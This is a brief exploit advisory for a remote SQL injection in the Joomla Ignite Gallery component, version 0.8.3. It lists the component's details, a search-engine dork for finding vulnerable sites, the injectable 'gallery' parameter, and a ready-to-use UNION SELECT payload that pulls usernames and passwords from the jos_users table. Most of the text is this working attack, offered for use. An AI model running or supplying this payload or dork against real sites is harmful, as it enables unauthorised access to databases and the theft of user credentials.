The Joomla Ignite Gallery component version 0.8.3 suffers from a remote SQL injection vulnerability.
4c8e09305172b89038a71af592e43a497fbffcdafd4c0b16751479c43684ee3f
#############################################################################
# #
# Joomla Component Ignite Gallery SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Ignite Gallery (com_ignitegallery)"
[~] Version: "0.8.3"
[~] Author: "Matt Thomson"
[~] Author E-mail: "matt@ignitejoomlaextensions.com"
[~] Author URL: "www.ignitejoomlaextensions.com"
########################################
[~] DORK: inurl:"com_ignitegallery"
########################################
[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
########################################